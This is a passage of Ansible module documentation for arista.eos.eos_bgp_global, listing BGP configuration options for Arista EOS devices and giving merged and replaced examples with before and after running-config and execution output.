description: Neighbor AS number
type: str
log_neighbor_changes:
description: Log neighbor up/down events.
type: bool
missing_policy:
description: Missing policy override configuration commands.
type: dict
suboptions:
direction:
description: Missing policy direction options.
type: str
choices: ['in', 'out']
action:
description: Missing policy action options.
type: str
choices: ['deny', 'permit', 'deny-in-out']
monitoring:
description: Enable Bgp monitoring for all/specified stations.
type: bool
next_hop_unchanged:
description: Preserve original nexthop while advertising routes to
eBGP peers.
type: bool
redistribute_internal:
description: Redistribute internal BGP routes.
type: bool
route:
description: Configure route-map for route installation.
type: str
route_reflector:
description: Configure route reflector options
type: dict
suboptions:
set:
description: When True route_reflector is set.
type: bool
preserve:
description: preserve route attributes, overwriting route-map changes
type: bool
transport:
description: Configure transport port for TCP session
type: int
default_metric:
description: Default metric.
type: int
distance:
description: Define an administrative distance.
type: dict
suboptions:
external:
description: distance for external routes.
type: int
internal:
description: distance for internal routes.
type: int
local:
description: distance for local routes.
type: int
graceful_restart:
description: Enable graceful restart mode.
type: dict
suboptions:
set:
description: When True, graceful restart is set.
type: bool
restart_time:
description: Set the max time needed to restart and come back up.
type: int
stalepath_time:
description: Set the max time to hold onto restarting peer stale paths.
type: int
graceful_restart_helper:
description: Enable graceful restart helper mode.
type: bool
access_group:
description: ip/ipv6 access list configuration.
type: dict
suboptions:
afi:
description: Specify ip/ipv6.
type: str
choices: ['ipv4', 'ipv6']
acl_name:
description: access list name.
type: str
direction:
description: direction of packets.
type: str
maximum_paths:
description: Maximum number of equal cost paths.
type: dict
suboptions:
max_equal_cost_paths:
description: Value for maximum number of equal cost paths.
type: int
max_installed_ecmp_paths:
description: Value for maximum number of installed ECMP routes.
type: int
monitoring:
description: BGP monitoring protocol configuration.
type: dict
suboptions:
port:
description: Configure the BGP monitoring protocol port number <1024-65535>.
type: int
received:
description: BGP monitoring protocol received route selection.
type: str
choices: ['post_policy', 'pre_policy']
station:
description: BGP monitoring station configuration.
type: str
timestamp:
description: BGP monitoring protocol Per-Peer Header timestamp behavior.
type: str
choices: ['none', 'send_time']
neighbor:
description: Configure routing for a network.
type: list
elements: dict
suboptions:
peer:
type: str
description: Neighbor address or peer-group.
additional_paths:
description: BGP additional-paths commands.
type: str
choices: ['send', 'receive']
allowas_in:
description: Allow local-as in updates.
type: dict
suboptions:
set:
description: When True, it is set.
type: bool
count:
description: Number of local ASNs allowed in a BGP update.
type: int
auto_local_addr:
description: Automatically determine the local address to be used
for the non-transport AF.
type: bool
default_originate:
description: Originate default route to this neighbor.
type: dict
suboptions:
route_map:
description: Route map reference.
type: str
always:
description: Always originate default route to this neighbor.
type: bool
description:
description: Text describing the neighbor.
type: str
dont_capability_negotiate:
description: Do not perform Capability Negotiation with this
neighbor.
type: bool
ebgp_multihop:
description: Allow BGP connections to indirectly connected
external peers.
type: dict
suboptions:
ttl:
description: Time-to-live in the range 1-255 hops.
type: int
set:
description: If True, ttl is not set.
type: bool
enforce_first_as:
description: Enforce the First AS for EBGP routes(default).
type: bool
export_localpref:
description: Override localpref when exporting to an internal
peer.
type: int
fall_over:
description: Configure BFD protocol options for this peer.
type: bool
graceful_restart:
description: Enable graceful restart mode.
type: bool
graceful_restart_helper:
description: Enable graceful restart helper mode.
type: bool
idle_restart_timer:
description: Neighbor idle restart timer.
type: int
import_localpref:
description: Override localpref when importing from an external
peer.
type: int
link_bandwidth:
description: Enable link bandwidth community for routes to this
peer.
type: dict
suboptions:
set:
description: If True, set link bandwidth
type: bool
auto:
description: Enable link bandwidth auto generation for routes from this peer.
type: bool
default:
description: Enable link bandwidth default generation for routes from this
peer.
type: str
update_delay:
description: Delay outbound route updates.
type: int
local_as:
description: Configure local AS number advertised to peer.
type: dict
suboptions:
as_number:
description: AS number.
type: str
fallback:
description: Prefer router AS Number over local AS Number.
type: bool
local_v6_addr:
description: The local IPv6 address of the neighbor in A:B:C:D:E:F:G:H format.
type: str
maximum_accepted_routes:
description: Maximum number of routes accepted from this peer.
type: dict
suboptions:
count:
description: Maximum number of accepted routes (0 means unlimited).
type: int
warning_limit:
description: Maximum number of accepted routes after which a warning is issued (0 means never warn).
type: int
maximum_received_routes:
description: Maximum number of routes received from this peer.
type: dict
suboptions:
count:
description: Maximum number of routes (0 means unlimited).
type: int
warning_limit:
description: Percentage of maximum-routes at which warning is to be issued.
type: dict
suboptions:
limit_count:
description: Number of routes at which to warn.
type: int
limit_percent:
description: Percentage of maximum number of routes at which to warn (1-100).
type: int
warning_only:
description: Only warn, no restart, if max route limit exceeded.
type: bool
metric_out:
description: MED value to advertise to peer.
type: int
monitoring:
description: Enable BGP Monitoring Protocol for this peer.
type: bool
next_hop_self:
description: Always advertise this router address as the BGP
next hop
type: bool
next_hop_unchanged:
description: Preserve original nexthop while advertising routes to
eBGP peers.
type: bool
next_hop_v6_address:
description: IPv6 next-hop address for the neighbor
type: str
out_delay:
description: Delay outbound route updates.
type: int
encryption_password:
description: Password to use in computation of MD5 hash.
type: dict
suboptions:
type:
description: Encryption type.
type: int
choices: [0, 7]
password:
description: password (up to 80 chars).
type: str
remote_as:
description: Neighbor Autonomous System.
type: str
remove_private_as:
description: Remove private AS number from updates to this peer.
type: dict
suboptions:
set:
description: If True, set remove_private_as.
type: bool
all:
description: Remove private AS number.
type: bool
replace_as:
description: Replace private AS number with local AS number.
type: bool
peer_group:
description: Name of the peer-group.
type: str
prefix_list:
description: Prefix list reference.
type: dict
suboptions:
direction:
description: Configure an inbound/outbound prefix-list.
type: str
choices: ['in', 'out']
name:
description: prefix list name.
type: str
route_map:
description: Route map reference.
type: dict
suboptions:
direction:
description: Configure an inbound/outbound route-map.
type: str
choices: ['in', 'out']
name:
description: Route map name.
type: str
route_reflector_client:
description: Configure peer as a route reflector client.
type: bool
route_to_peer:
description: Use routing table information to reach the peer.
type: bool
send_community:
description: Send community attribute to this neighbor.
type: dict
suboptions:
community_attribute:
description: Type of community attributes to send to this neighbor.
type: str
sub_attribute:
description: Attribute to be sent to the neighbor.
type: str
choices: ['extended', 'link-bandwidth', 'standard']
link_bandwidth_attribute:
description: cumulative/aggregate attribute to be sent.
type: str
choices: ['aggregate', 'divide']
speed:
description: Reference link speed in bits/second
type: str
divide:
description: link-bandwidth divide attribute.
type: str
choices: ['equal', 'ratio']
shut_down:
description: Administratively shut down this neighbor.
type: bool
soft_recognition:
description: Configure how to handle routes that fail import.
type: str
choices: ['all', 'None']
timers:
description: Timers.
type: dict
suboptions:
keepalive:
description: Keep Alive Interval in secs.
type: int
holdtime:
description: Hold time in secs.
type: int
transport:
description: Configure transport options for TCP session.
type: dict
suboptions:
connection_mode:
description: Configure connection-mode for TCP session.
type: str
remote_port:
description: Configure BGP peer TCP port to connect to.
type: int
ttl:
description: BGP ttl security check
type: int
update_source:
description: Specify the local source interface for peer BGP
sessions.
type: str
weight:
description: Weight to assign.
type: int
network:
description: Configure routing for a network.
type: list
elements: dict
suboptions:
address:
description: address prefix.
type: str
route_map:
description: Name of route map.
type: str
redistribute:
description: Redistribute routes in to BGP.
type: list
elements: dict
suboptions:
protocol:
description: Routes to be redistributed.
type: str
choices: ['isis', 'ospf3', 'ospf', 'attached-host', 'connected', 'rip', 'static']
route_map:
description: Route map reference.
type: str
isis_level:
description: Applicable for isis routes. Specify isis route level.
type: str
choices: ['level-1', 'level-2', 'level-1-2']
ospf_route:
description: ospf route options.
type: str
choices: ['internal', 'external', 'nssa_external_1', 'nssa_external_2']
router_id:
description: Router id.
type: str
route_target:
description: Route target.
type: dict
suboptions:
action:
description: Route action.
type: str
choices: ['both', 'import', 'export']
target:
description: Route Target.
type: str
shutdown:
description: When True, shut down BGP.
type: bool
timers:
description: Timers.
type: dict
suboptions:
keepalive:
description: Keep Alive Interval in secs.
type: int
holdtime:
description: Hold time in secs.
type: int
ucmp:
description: Configure unequal cost multipathing.
type: dict
suboptions:
fec:
description: Configure UCMP fec utilization threshold.
type: dict
suboptions:
trigger:
description: UCMP fec utilization too high threshold.
type: int
clear:
description: UCMP FEC utilization Clear thresholds.
type: int
link_bandwidth:
description: Configure link-bandwidth propagation delay.
type: dict
suboptions:
mode:
description: UCMP link bandwidth mode
type: str
choices: ['encoding_weighted', 'recursive']
update_delay:
description: Link Bandwidth Advertisement delay.
type: int
mode:
description: UCMP mode.
type: dict
suboptions:
set:
description: If True, ucmp mode is set to 1.
type: bool
nexthops:
description: Value for total number UCMP nexthops.
type: int
update:
description: Configure BGP update generation.
type: dict
suboptions:
wait_for:
description: wait for options before converge or synchronize.
type: str
choices: ['wait_for_convergence', 'wait_install']
batch_size:
description: batch size for FIB route acknowledgements.
type: int
vlan:
description: Configure MAC VRF BGP for single VLAN support.
type: int
vlan_aware_bundle:
description: Configure MAC VRF BGP for multiple VLAN support.
type: str
vrfs:
description: Configure BGP in a VRF.
type: list
elements: dict
suboptions:
vrf:
description: VRF name.
type: str
aggregate_address:
description: Configure aggregate address.
type: list
elements: dict
suboptions:
address:
description: ipv4/ipv6 address prefix.
type: str
advertise_only:
description: Advertise without installing the generated blackhole route in
FIB.
type: bool
as_set:
description: Generate autonomous system set path information.
type: bool
attribute_map:
description: Name of the route map used to set the attribute of the
aggregate route.
type: str
match_map:
description: Name of the route map used to filter the contributors of the
aggregate route.
type: str
summary_only:
description: Filters all more-specific routes from updates.
type: bool
bgp_params:
description: BGP parameters.
type: dict
suboptions:
additional_paths:
description: BGP additional-paths commands
type: str
choices: ['install', 'send', 'receive']
advertise_inactive:
description: Advertise BGP routes even if they are inactive in RIB.
type: bool
allowas_in:
description: Allow local-as in updates.
type: dict
suboptions:
set:
description: When True, it is set.
type: bool
count:
description: Number of local ASNs allowed in a BGP update.
type: int
always_compare_med:
description: BGP Always Compare MED
type: bool
asn:
description: AS Number notation.
type: str
choices: ['asdot', 'asplain']
auto_local_addr:
description: Automatically determine the local address to be used
for the non-transport AF.
type: bool
bestpath:
description: Select the bestpath selection algorithm for BGP routes.
type: dict
suboptions:
as_path:
description: Select the bestpath selection based on as-path.
type: str
choices: ['ignore', 'multipath_relax']
ecmp_fast:
description: Tie-break BGP paths in a ECMP group based on the order of arrival.
type: bool
med:
description: MED attribute
type: dict
suboptions:
confed:
description: MED Confed.
type: bool
missing_as_worst:
description: MED missing-as-worst.
type: bool
skip:
description: skip one of the tie breaking rules in the bestpath selection.
type: bool
tie_break:
description: Configure the tie-break option for BGP bestpath selection.
choices: ['cluster_list_length', 'router_id']
type: str
client_to_client:
description: client to client configuration.
type: bool
cluster_id:
description: Cluster ID of this router acting as a route reflector.
type: str
confederation:
description: confederation.
type: dict
suboptions:
identifier:
description: Confederation identifier.
type: str
peers:
description: Confederation peers.
type: str
control_plane_filter:
description: Control plane filter for BGP.
type: bool
convergence:
description: Bgp convergence parameters.
type: dict
suboptions:
slow_peer:
description: Maximum amount of time to wait for slow peers to establish session.
type: bool
time:
description: time in secs
type: int
default:
description: Default neighbor configuration commands.
type: str
choices: ['ipv4_unicast', 'ipv6_unicast']
enforce_first_as:
description: Enforce the First AS for EBGP routes(default).
type: bool
host_routes:
description: BGP host routes configuration.
type: bool
labeled_unicast:
description: Labeled Unicast.
type: str
choices: ['ip', 'tunnel']
listen:
description: BGP listen.
type: dict
suboptions:
limit:
description: Set limit on the number of dynamic BGP peers allowed.
type: int
range:
description: Subnet Range to be associated with the peer-group.
type: dict
suboptions:
address:
description: Address prefix
type: str
peer_group:
description: Name of peer group.
type: dict
suboptions:
name:
description: name.
type: str
peer_filter:
description: Name of peer filter.
type: str
remote_as:
description: Neighbor AS number
type: str
log_neighbor_changes:
description: Log neighbor up/down events.
type: bool
missing_policy:
description: Missing policy override configuration commands.
type: dict
suboptions:
direction:
description: Missing policy direction options.
type: str
choices: ['in', 'out']
action:
description: Missing policy action options.
type: str
choices: ['deny', 'permit', 'deny-in-out']
monitoring:
description: Enable Bgp monitoring for all/specified stations.
type: bool
next_hop_unchanged:
description: Preserve original nexthop while advertising routes to
eBGP peers.
type: bool
redistribute_internal:
description: Redistribute internal BGP routes.
type: bool
route:
description: Configure route-map for route installation.
type: str
route_reflector:
description: Configure route reflector options
type: dict
suboptions:
set:
description: When True route_reflector is set.
type: bool
preserve:
description: preserve route attributes, overwriting route-map changes
type: bool
transport:
description: Configure transport port for TCP session
type: int
default_metric:
description: Default metric.
type: int
distance:
description: Define an administrative distance.
type: dict
suboptions:
external:
description: distance for external routes.
type: int
internal:
description: distance for internal routes.
type: int
local:
description: distance for local routes.
type: int
graceful_restart:
description: Enable graceful restart mode.
type: dict
suboptions:
set:
description: When True, graceful restart is set.
type: bool
restart_time:
description: Set the max time needed to restart and come back up.
type: int
stalepath_time:
description: Set the max time to hold onto restarting peer stale paths.
type: int
graceful_restart_helper:
description: Enable graceful restart helper mode.
type: bool
access_group:
description: ip/ipv6 access list configuration.
type: dict
suboptions:
afi:
description: Specify ip/ipv6.
type: str
choices: ['ip', 'ipv6']
acl_name:
description: access list name.
type: str
direction:
description: direction of packets.
type: str
maximum_paths:
description: Maximum number of equal cost paths.
type: dict
suboptions:
max_equal_cost_paths:
description: Value for maximum number of equal cost paths.
type: int
max_installed_ecmp_paths:
description: Value for maximum number of installed ECMP routes.
type: int
neighbor:
description: Configure routing for a network.
type: list
elements: dict
suboptions:
peer:
type: str
description: Neighbor address or peer group.
additional_paths:
description: BGP additional-paths commands.
type: str
choices: ['send', 'receive']
allowas_in:
description: Allow local-as in updates.
type: dict
suboptions:
set:
description: When True, it is set.
type: bool
count:
description: Number of local ASNs allowed in a BGP update.
type: int
auto_local_addr:
description: Automatically determine the local address to be used
for the non-transport AF.
type: bool
default_originate:
description: Originate default route to this neighbor.
type: dict
suboptions:
route_map:
description: Route map reference.
type: str
always:
description: Always originate default route to this neighbor.
type: bool
description:
description: Text describing the neighbor.
type: str
dont_capability_negotiate:
description: Do not perform Capability Negotiation with this
neighbor.
type: bool
ebgp_multihop:
description: Allow BGP connections to indirectly connected
external peers.
type: dict
suboptions:
ttl:
description: Time-to-live in the range 1-255 hops.
type: int
set:
description: If True, ttl is not set.
type: bool
enforce_first_as:
description: Enforce the First AS for EBGP routes(default).
type: bool
export_localpref:
description: Override localpref when exporting to an internal
peer.
type: int
fall_over:
description: Configure BFD protocol options for this peer.
type: bool
graceful_restart:
description: Enable graceful restart mode.
type: bool
graceful_restart_helper:
description: Enable graceful restart helper mode.
type: bool
idle_restart_timer:
description: Neighbor idle restart timer.
type: int
import_localpref:
description: Override localpref when importing from an external
peer.
type: int
link_bandwidth:
description: Enable link bandwidth community for routes to this
peer.
type: dict
suboptions:
set:
description: If True, set link bandwidth
type: bool
auto:
description: Enable link bandwidth auto generation for routes from this peer.
type: bool
default:
description: Enable link bandwidth default generation for routes from this
peer.
type: str
update_delay:
description: Delay outbound route updates.
type: int
local_as:
description: Configure local AS number advertised to peer.
type: dict
suboptions:
as_number:
description: AS number.
type: str
fallback:
description: Prefer router AS Number over local AS Number.
type: bool
local_v6_addr:
description: The local IPv6 address of the neighbor in A:B:C:D:E:F:G:H format.
type: str
maximum_accepted_routes:
description: Maximum number of routes accepted from this peer.
type: dict
suboptions:
count:
description: Maximum number of accepted routes (0 means unlimited).
type: int
warning_limit:
description: Maximum number of accepted routes after which a warning is issued (0 means never warn).
type: int
maximum_received_routes:
description: Maximum number of routes received from this peer.
type: dict
suboptions:
count:
description: Maximum number of routes (0 means unlimited).
type: int
warning_limit:
description: Percentage of maximum-routes at which warning is to be issued.
type: dict
suboptions:
limit_count:
description: Number of routes at which to warn.
type: int
limit_percent:
description: Percentage of maximum number of routes at which to warn (1-100).
type: int
warning_only:
description: Only warn, no restart, if max route limit exceeded.
type: bool
metric_out:
description: MED value to advertise to peer.
type: int
monitoring:
description: Enable BGP Monitoring Protocol for this peer.
type: bool
next_hop_self:
description: Always advertise this router address as the BGP
next hop
type: bool
next_hop_unchanged:
description: Preserve original nexthop while advertising routes to
eBGP peers.
type: bool
next_hop_v6_address:
description: IPv6 next-hop address for the neighbor
type: str
out_delay:
description: Delay outbound route updates.
type: int
encryption_password:
description: Password to use in computation of MD5 hash.
type: dict
suboptions:
type:
description: Encryption type.
type: int
choices: [0, 7]
password:
description: password (up to 80 chars).
type: str
remote_as:
description: Neighbor Autonomous System.
type: str
remove_private_as:
description: Remove private AS number from updates to this peer.
type: dict
suboptions:
set:
description: If True, set remove_private_as.
type: bool
all:
description: Remove private AS number.
type: bool
replace_as:
description: Replace private AS number with local AS number.
type: bool
peer_group:
description: Name of the peer-group.
type: str
prefix_list:
description: Prefix list reference.
type: dict
suboptions:
direction:
description: Configure an inbound/outbound prefix-list.
type: str
choices: ['in', 'out']
name:
description: prefix list name.
type: str
route_map:
description: Route map reference.
type: dict
suboptions:
direction:
description: Configure an inbound/outbound route-map.
type: str
choices: ['in', 'out']
name:
description: Route map name.
type: str
route_reflector_client:
description: Configure peer as a route reflector client.
type: bool
route_to_peer:
description: Use routing table information to reach the peer.
type: bool
send_community:
description: Send community attribute to this neighbor.
type: dict
suboptions:
community_attribute:
description: Type of community attributes to send to this neighbor.
type: str
sub_attribute:
description: Attribute to be sent to the neighbor.
type: str
choices: ['extended', 'link-bandwidth', 'standard']
link_bandwidth_attribute:
description: cumulative/aggregate attribute to be sent.
type: str
choices: ['aggregate', 'divide']
speed:
description: Reference link speed in bits/second
type: str
divide:
description: link-bandwidth divide attribute.
type: str
choices: ['equal', 'ratio']
shut_down:
description: Administratively shut down this neighbor.
type: bool
soft_recognition:
description: Configure how to handle routes that fail import.
type: str
choices: ['all', 'None']
timers:
description: Timers.
type: dict
suboptions:
keepalive:
description: Keep Alive Interval in secs.
type: int
holdtime:
description: Hold time in secs.
type: int
transport:
description: Configure transport options for TCP session.
type: dict
suboptions:
connection_mode:
description: Configure connection-mode for TCP session.
type: str
remote_port:
description: Configure BGP peer TCP port to connect to.
type: int
ttl:
description: BGP ttl security check
type: int
update_source:
description: Specify the local source interface for peer BGP
sessions.
type: str
weight:
description: Weight to assign.
type: int
network:
description: Configure routing for a network.
type: list
elements: dict
suboptions:
address:
description: address prefix.
type: str
route_map:
description: Name of route map.
type: str
redistribute:
description: Redistribute routes in to BGP.
type: list
elements: dict
suboptions:
protocol:
description: Routes to be redistributed.
type: str
choices: ['isis', 'ospf3', 'ospf', 'attached-host', 'connected', 'rip', 'static']
route_map:
description: Route map reference.
type: str
isis_level:
description: Applicable for isis routes. Specify isis route level.
type: str
choices: ['level-1', 'level-2', 'level-1-2']
ospf_route:
description: ospf route options.
type: str
choices: ['internal', 'external', 'nssa_external_1', 'nssa_external_2']
route_target:
description: Route target.
type: dict
suboptions:
action:
description: Route action.
type: str
choices: ['both', 'import', 'export']
target:
description: Route Target.
type: str
router_id:
description: Router id.
type: str
shutdown:
description: When True, shut down BGP.
type: bool
timers:
description: Timers.
type: dict
suboptions:
keepalive:
description: Keep Alive Interval in secs.
type: int
holdtime:
description: Hold time in secs.
type: int
ucmp:
description: Configure unequal cost multipathing.
type: dict
suboptions:
fec:
description: Configure UCMP fec utilization threshold.
type: dict
suboptions:
trigger:
description: UCMP fec utilization too high threshold.
type: int
clear:
description: UCMP FEC utilization Clear thresholds.
type: int
link_bandwidth:
description: Configure link-bandwidth propagation delay.
type: dict
suboptions:
mode:
description: UCMP link bandwidth mode
type: str
choices: ['encoding_weighted', 'recursive']
update_delay:
description: Link Bandwidth Advertisement delay.
type: int
mode:
description: UCMP mode.
type: dict
suboptions:
set:
description: If True, ucmp mode is set to 1.
type: bool
nexthops:
description: Value for total number UCMP nexthops.
type: int
update:
description: Configure BGP update generation.
type: dict
suboptions:
wait_for:
description: wait for options before converge or synchronize.
type: str
choices: ['wait_for_convergence', 'wait_install']
batch_size:
description: batch size for FIB route acknowledgements.
type: int
running_config:
description:
- This option is used only with state I(parsed).
- The value of this option should be the output received from the EOS device by
executing the command B(show running-config | section bgp).
- The state I(parsed) reads the configuration from C(running_config) option and
transforms it into Ansible structured data as per the resource module's argspec
and the value is then returned in the I(parsed) key within the result.
type: str
state:
description:
- The state the configuration should be left in.
- State I(purged) removes all the BGP configurations from the
target device. Use caution with this state ('no router bgp <x>').
- State I(deleted) only removes BGP attributes that this modules
manages and does not negate the BGP process completely. Thereby, preserving
address-family related configurations under BGP context.
- Running states I(deleted) and I(replaced) will result in an error if there
are address-family configuration lines present under vrf context that is
to be removed. Please use the M(arista.eos.eos_bgp_address_family)
module for prior cleanup.
- Refer to examples for more details.
type: str
choices: [deleted, merged, purged, replaced, gathered, rendered, parsed]
default: merged
"""
EXAMPLES = """
# Using merged
# Before state
# veos(config)#show running-config | section bgp
# veos(config)#
- name: Merge provided configuration with device configuration
arista.eos.eos_bgp_global:
config:
as_number: "100"
bgp_params:
host_routes: True
convergence:
slow_peer: True
time: 6
additional_paths: "send"
log_neighbor_changes: True
maximum_paths:
max_equal_cost_paths: 55
aggregate_address:
- address: "1.2.1.0/24"
as_set: true
match_map: "match01"
- address: "5.2.1.0/24"
attribute_map: "attrmatch01"
advertise_only: true
redistribute:
- protocol: "static"
route_map: "map_static"
- protocol: "attached-host"
distance:
internal: 50
neighbor:
- peer: "10.1.3.2"
allowas_in:
set: true
default_originate:
always: true
dont_capability_negotiate: true
export_localpref: 4000
maximum_received_routes:
count: 500
warning_limit:
limit_percent: 5
next_hop_unchanged: true
prefix_list:
name: "prefix01"
direction: "out"
- peer: "peer1"
fall_over: true
link_bandwidth:
update_delay: 5
monitoring: True
send_community:
community_attribute: "extended"
sub_attribute: "link-bandwidth"
link_bandwidth_attribute: "aggregate"
speed: "600"
vlan: 5
state: merged
# After State:
# veos(config)#show running-config | section bgp
# router bgp 100
# bgp convergence slow-peer time 6
# distance bgp 50 50 50
# maximum-paths 55
# bgp additional-paths send any
# neighbor peer1 peer-group
# neighbor peer1 link-bandwidth update-delay 5
# neighbor peer1 fall-over bfd
# neighbor peer1 monitoring
# neighbor peer1 send-community extended link-bandwidth aggregate 600
# neighbor peer1 maximum-routes 12000
# neighbor 10.1.3.2 export-localpref 4000
# neighbor 10.1.3.2 next-hop-unchanged
# neighbor 10.1.3.2 dont-capability-negotiate
# neighbor 10.1.3.2 allowas-in 3
# neighbor 10.1.3.2 default-originate always
# neighbor 10.1.3.2 maximum-routes 500 warning-limit 5 percent
# aggregate-address 1.2.1.0/24 as-set match-map match01
# aggregate-address 5.2.1.0/24 attribute-map attrmatch01 advertise-only
# redistribute static route-map map_static
# redistribute attached-host
# !
# vlan 5
# !
# address-family ipv4
# neighbor 10.1.3.2 prefix-list prefix01 out
# veos(config)#
#
# Module Execution:
#
# "after": {
# "aggregate_address": [
# {
# "address": "1.2.1.0/24",
# "as_set": true,
# "match_map": "match01"
# },
# {
# "address": "5.2.1.0/24",
# "advertise_only": true,
# "attribute_map": "attrmatch01"
# }
# ],
# "as_number": "100",
# "bgp_params": {
# "additional_paths": "send",
# "convergence": {
# "slow_peer": true,
# "time": 6
# }
# },
# "distance": {
# "external": 50,
# "internal": 50,
# "local": 50
# },
# "maximum_paths": {
# "max_equal_cost_paths": 55
# },
# "neighbor": [
# {
# "fall_over": true,
# "link_bandwidth": {
# "set": true,
# "update_delay": 5
# },
# "maximum_received_routes": {
# "count": 12000
# },
# "monitoring": true,
# "peer": "peer1",
# "peer_group": "peer1",
# "send_community": {
# "community_attribute": "extended",
# "link_bandwidth_attribute": "aggregate",
# "speed": "600",
# "sub_attribute": "link-bandwidth"
# }
# },
# {
# "allowas_in": {
# "count": 3
# },
# "default_originate": {
# "always": true
# },
# "dont_capability_negotiate": true,
# "export_localpref": 4000,
# "maximum_received_routes": {
# "count": 500,
# "warning_limit": {
# "limit_percent": 5
# }
# },
# "next_hop_unchanged": true,
# "peer": "10.1.3.2"
# }
# ],
# "redistribute": [
# {
# "protocol": "static",
# "route_map": "map_static"
# },
# {
# "protocol": "attached-host"
# }
# ],
# "vlan": 5
# },
# "before": {},
# "changed": true,
# "commands": [
# "router bgp 100",
# "neighbor 10.1.3.2 allowas-in",
# "neighbor 10.1.3.2 default-originate always",
# "neighbor 10.1.3.2 dont-capability-negotiate",
# "neighbor 10.1.3.2 export-localpref 4000",
# "neighbor 10.1.3.2 maximum-routes 500 warning-limit 5 percent",
# "neighbor 10.1.3.2 next-hop-unchanged",
# "neighbor 10.1.3.2 prefix-list prefix01 out",
# "neighbor peer1 fall-over bfd",
# "neighbor peer1 link-bandwidth update-delay 5",
# "neighbor peer1 monitoring",
# "neighbor peer1 send-community extended link-bandwidth aggregate 600",
# "redistribute static route-map map_static",
# "redistribute attached-host",
# "aggregate-address 1.2.1.0/24 as-set match-map match01",
# "aggregate-address 5.2.1.0/24 attribute-map attrmatch01 advertise-only",
# "bgp host-routes fib direct-install",
# "bgp convergence slow-peer time 6",
# "bgp additional-paths send any",
# "bgp log-neighbor-changes",
# "maximum-paths 55",
# "distance bgp 50",
# "vlan 5"
# ],
# Using replaced:
# Before state:
# veos(config)#show running-config | section bgp
# router bgp 100
# bgp convergence slow-peer time 6
# distance bgp 50 50 50
# maximum-paths 55
# bgp additional-paths send any
# neighbor peer1 peer-group
# neighbor peer1 link-bandwidth update-delay 5
# neighbor peer1 fall-over bfd
# neighbor peer1 monitoring
# neighbor peer1 send-community extended link-bandwidth aggregate 600
# neighbor peer1 maximum-routes 12000
# neighbor 10.1.3.2 export-localpref 4000
# neighbor 10.1.3.2 next-hop-unchanged
# neighbor 10.1.3.2 dont-capability-negotiate
# neighbor 10.1.3.2 allowas-in 3
# neighbor 10.1.3.2 default-originate always
# neighbor 10.1.3.2 maximum-routes 500 warning-limit 5 percent
# aggregate-address 1.2.1.0/24 as-set match-map match01
# aggregate-address 5.2.1.0/24 attribute-map attrmatch01 advertise-only
# redistribute static route-map map_static
# redistribute attached-host
# !
# vlan 5
# !
# address-family ipv4
# neighbor 10.1.3.2 prefix-list prefix01 out
# !
# vrf vrf01
# route-target import 54:11
# neighbor 192.168.3.11 dont-capability-negotiate
# neighbor 192.168.3.11 allowas-in 3
# neighbor 192.168.3.11 default-originate always
# neighbor 192.168.3.11 maximum-routes 12000
# veos(config)#
- name: replace provided configuration with device configuration
arista.eos.eos_bgp_global:
config:
as_number: "100"
bgp_params:
host_routes: True
convergence:
slow_peer: True
time: 6
additional_paths: "send"
log_neighbor_changes: True
vrfs:
- vrf: "vrf01"
maximum_paths:
max_equal_cost_paths: 55
aggregate_address:
- address: "1.2.1.0/24"
as_set: true
match_map: "match01"
- address: "5.2.1.0/24"
attribute_map: "attrmatch01"
advertise_only: true
redistribute:
- protocol: "static"
route_map: "map_static"
- protocol: "attached-host"
distance:
internal: 50
neighbor:
- peer: "10.1.3.2"
allowas_in:
set: true
default_originate:
always: true
dont_capability_negotiate: true
export_localpref: 4000
maximum_received_routes:
count: 500
warning_limit:
limit_percent: 5
next_hop_unchanged: true
prefix_list:
name: "prefix01"
direction: "out"
- peer: "peer1"
fall_over: true
link_bandwidth:
update_delay: 5
monitoring: True
send_community:
community_attribute: "extended"
sub_attribute: "link-bandwidth"
link_bandwidth_attribute: "aggregate"
speed: "600"
state: replaced
# After State:
# veos(config)#show running-config | section bgp
# router bgp 100
# bgp convergence slow-peer time 6
# bgp additional-paths send any
# !
# vrf vrf01
# distance bgp 50 50 50
# maximum-paths 55
# neighbor 10.1.3.2 export-localpref 4000
# neighbor 10.1.3.2 next-hop-unchanged
# neighbor 10.1.3.2 dont-capability-negotiate
# neighbor 10.1.3.2 allowas-in 3
# neighbor 10.1.3.2 default-originate always
# neighbor 10.1.3.2 maximum-routes 500 warning-limit 5 percent
# aggregate-address 1.2.1.0/24 as-set match-map match01
# aggregate-address 5.2.1.0/24 attribute-map attrmatch01 advertise-only
# redistribute static route-map map_static
# redistribute attached-host
# !
# address-family ipv4
# neighbor 10.1.3.2 prefix-list prefix01 out
# veos(config)#
#
#
# Module Execution:
#
# "after": {
# "as_number": "100",
# "bgp_params": {
# "additional_paths": "send",
# "convergence": {
# "slow_peer": true,
# "time": 6
# }
# },
# "vrfs": [
# {
# "aggregate_address": [
# {
# "address": "1.2.1.0/24",
# "as_set": true,
# "match_map": "match01"
# },
# {
# "address": "5.2.1.0/24",
# "advertise_only": true,
# "attribute_map": "attrmatch01"
# }
# ],
# "distance": {
# "external": 50,
# "internal": 50,
# "local": 50
# },
# "maximum_paths": {
# "max_equal_cost_paths": 55
# },
# "neighbor": [
# {
# "allowas_in": {
# "count": 3
# },
# "default_originate": {
# "always": true
# },
# "dont_capability_negotiate": true,
# "export_localpref": 4000,
# "maximum_received_routes": {
# "count": 500,
# "warning_limit": {
# "limit_percent": 5
# }
# },
# "next_hop_unchanged": true,
# "peer": "10.1.3.2"
# }
# ],
# "redistribute": [
# {
# "protocol": "static",
# "route_map": "map_static"
# },
# {
# "protocol": "attached-host"
# }
# ],
# "vrf": "vrf01"
# }
# ]
# },
# "before": {
# "aggregate_address": [
# {
# "address": "1.2.1.0/24",
# "as_set": true,
# "match_map": "match01"
# },
# {
# "address": "5.2.1.0/24",
# "advertise_only": true,
# "attribute_map": "attrmatch01"
# }
# ],
# "as_number": "100",
# "bgp_params": {
# "additional_paths": "send",
# "convergence": {
# "slow_peer": true,
# "time": 6
# }
# },
# "distance": {
# "external": 50,
# "internal": 50,
# "local": 50
# },
# "maximum_paths": {
# "max_equal_cost_paths": 55
# },
# "neighbor": [
# {
# "fall_over": true,
# "link_bandwidth": {
# "set": true,
# "update_delay": 5
# },
# "maximum_received_routes": {
# "count": 12000
# },
# "monitoring": true,
# "peer": "peer1",
# "peer_group": "peer1",
# "send_community": {
# "community_attribute": "extended",
# "link_bandwidth_attribute": "aggregate",
# "speed": "600",
# "sub_attribute": "link-bandwidth"
# }
# },
# {
# "allowas_in": {
# "count": 3
# },
# "default_originate": {
# "always": true
# },
# "dont_capability_negotiate": true,
# "export_localpref": 4000,
# "maximum_received_routes": {
